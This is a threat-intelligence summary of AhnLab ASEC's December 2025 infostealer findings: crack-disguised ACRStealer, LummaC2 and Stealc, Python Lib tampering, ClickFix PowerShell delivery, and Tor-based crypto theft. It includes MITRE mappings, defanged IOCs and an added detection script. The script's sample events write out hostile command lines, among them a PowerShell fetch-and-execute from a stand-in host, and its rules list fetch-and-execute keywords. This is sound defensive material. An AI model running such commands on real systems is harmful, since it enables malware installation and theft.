December 2025 Infostealer Trend Report

In December 2025, AhnLab ASEC observed heavy distribution of the infostealer families ACRStealer, LummaC2, and Stealc, primarily disguised as cracks and keygens and spread through SEO-poisoned posts on legitimate websites and compromised WordPress sites. Distribution methods included EXE droppers, DLL sideloading, tampering with Python library scripts, and Tor-backed cryptocurrency-stealing campaigns that monitor the clipboard and exfiltrate BIP39 mnemonic phrases.

Key points

  • AhnLab ASEC uses automated collection and analysis systems (crack/patch concealment collector, email honeypot, C2 analysis) and shares real-time IOCs via ATIP services.
  • Infostealers were commonly disguised as cracks/keygens and distributed through SEO poisoning by posting on legitimate sites and poorly managed WordPress installations.
  • The most widely distributed Infostealers in December 2025 were ACRStealer, LummaC2, and Stealc.
  • Two main execution methods observed: EXE droppers (65.8%) and DLL sideloading (34.2%), with DLL variants evading detection by resembling legitimate DLLs.
  • Trend 1: Attackers abused Python by modifying a script in the Lib directory (.\Lib\encodings\aliases.py) so that it executes a downloader (md5 5cabcab4…) when the legitimate Python executable starts; the downloader triggers ACRStealer via mshta and contacts a C2 at globalsnn3-new[.]cc.
  • Trend 2: Cryptocurrency-stealing campaigns used compromised WordPress posts and a ClickFix technique to trick users into running a PowerShell command that installs JavaScript malware and a Tor client (ugate.exe), registers scheduled tasks, and exfiltrates BIP39 phrases.
  • Malware used evasion tactics (suspending when Task Manager is opened), clipboard replacement of wallet addresses, and Tor for C2 communication to avoid detection and enable theft of crypto funds.

MITRE Techniques

  • [T1574.001] DLL Search Order Hijacking – DLL sideloading. (‘placing a legitimate EXE file and a malicious DLL file in the same folder so that when the legitimate EXE file is executed, the malicious DLL file is loaded.’)
  • [T1574] Hijack Execution Flow – Abusing Python initialization by modifying a Python library script to execute malicious code when the legitimate Python executable runs. (‘Because certain scripts within the Lib directory are executed automatically when the legitimate Python executable is launched, the attacker-modified script is triggered as part of the normal initialization process’)
  • [T1218.005] Mshta – Using mshta to access C2 and trigger payload execution. (‘The malware inserted by the threat actor behaves by accessing the C2 URL via mshta’)
  • [T1059.001] PowerShell – Delivery via user-executed malicious PowerShell commands visible after interacting with compromised posts. (‘a malicious PowerShell command and a copy button become visible, prompting the user to execute the command manually through PowerShell.’)
  • [T1053.005] Scheduled Task/Job – Persisting and periodically launching components by registering JavaScript malware in Windows Task Scheduler. (‘The JavaScript malware is registered in the Windows Task Scheduler to run periodically’)
  • [T1090.003] Tor – C2 communications routed over the Tor network using a bundled Tor client (ugate.exe) for covert command and control. (‘using this process to communicate with the C2 server via the Tor network.’)
  • [T1056.003] Input Capture: Clipboard – Monitoring and replacing clipboard contents to swap victim crypto addresses with attacker addresses. (‘When it detects a cryptocurrency wallet address, it replaces it with the attacker’s wallet address.’)
  • [T1041] Exfiltration Over C2 Channel – Exfiltrating BIP39 mnemonic phrases and other data back to the attacker C2 server. (‘if BIP39 mnemonic phrases are detected, the malware exfiltrates them to the C2 server.’)
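Detection heuristics for the execution chains described in Trends 1 and 2 and the techniques listed above, written here as an added example (not code from the report or from AhnLab) that runs over constructed process-creation events. The hostnames, paths and URL are assumed placeholders, and the rules are starting-point heuristics a SOC would tune, not ASEC's own signatures.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / EDR style)."""
    parent_image: str
    image: str
    command_line: str

URL = re.compile(r"https?://", re.I)
PS_FETCH_EXEC = ("iex", "invoke-expression", "downloadstring", "invoke-webrequest", "iwr")

def _is(path: str, name: str) -> bool:
    return path.lower().endswith("\\" + name)

def match_rules(e: ProcEvent) -> list[str]:
    """Return the names of the report-derived heuristics this event triggers."""
    hits, cl = [], e.command_line.lower()
    # Trend 1: a tampered Lib script makes python.exe launch mshta.exe against a URL.
    if _is(e.parent_image, "python.exe") and _is(e.image, "mshta.exe") and URL.search(cl):
        hits.append("python_spawns_mshta_with_url")
    # Trend 2 (ClickFix): PowerShell fetching remote content and executing it in one go.
    if _is(e.image, "powershell.exe") and URL.search(cl) and any(k in cl for k in PS_FETCH_EXEC):
        hits.append("powershell_remote_fetch_and_exec")
    # Trend 2: JavaScript payload started by the Task Scheduler service (hosted in svchost.exe).
    if _is(e.parent_image, "svchost.exe") and (_is(e.image, "wscript.exe") or _is(e.image, "cscript.exe")) and ".js" in cl:
        hits.append("scheduled_task_runs_js")
    # Trend 2: the bundled Tor client file name given in the report.
    if _is(e.image, "ugate.exe"):
        hits.append("tor_client_ugate")
    return hits

def detect(events) -> list[tuple[str, str]]:
    """Run every event through the rules; returns (image, rule) pairs."""
    return [(e.image, h) for e in events for h in match_rules(e)]

# Constructed sample telemetry (hypothetical hosts, paths and URL; not from the report).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Python311\python.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://c2.example/page"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr https://c2.example/z.dat | iex"'),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\u\AppData\Roaming\agent.js"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\u\AppData\Roaming\ugate.exe", "ugate.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Python311\python.exe", "python.exe build.py"),  # benign
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\tools\local.hta"),  # benign: local HTA, not spawned by python
]
```

Call `detect(SAMPLE_EVENTS)` to get four (image, rule) pairs, one per malicious event, and nothing for the two benign ones.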

Indicators of Compromise

  • [MD5] sample malware hashes observed – 5cabcab4233affa40bb8ddd846270779, 997748c5b3e24c6f42e63445bb252501, and 5 more hashes.
  • [URLs] C2 and download locations – hxxps://activatesoftinc[.]icu/zinfoz.dat (PowerShell download/C2), hxxps://globalsnn3-new[.]cc/newSide.forester (Python downloader C2), and http[:]//91[.]92[.]240[.]104[:]7777/apexfurllc[.]top/cattttt/Encrypted_Script[.]ps1 (hosted PS1 script).
  • [Onion URL] Tor C2 endpoint – hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route[.]php (JS Tor agent C2).
  • [FQDN] compromised/abused domains – www[.]braix[.]top (distribution site) and activatesoftinc[.]icu (C2 host).
  • [File names] files created or used by the campaigns – ugate.exe (Tor client/Trojan), Encrypted_Script.ps1 (dropper script), and a text file containing BIP39 keywords.

Read more: https://asec.ahnlab.com/en/92142/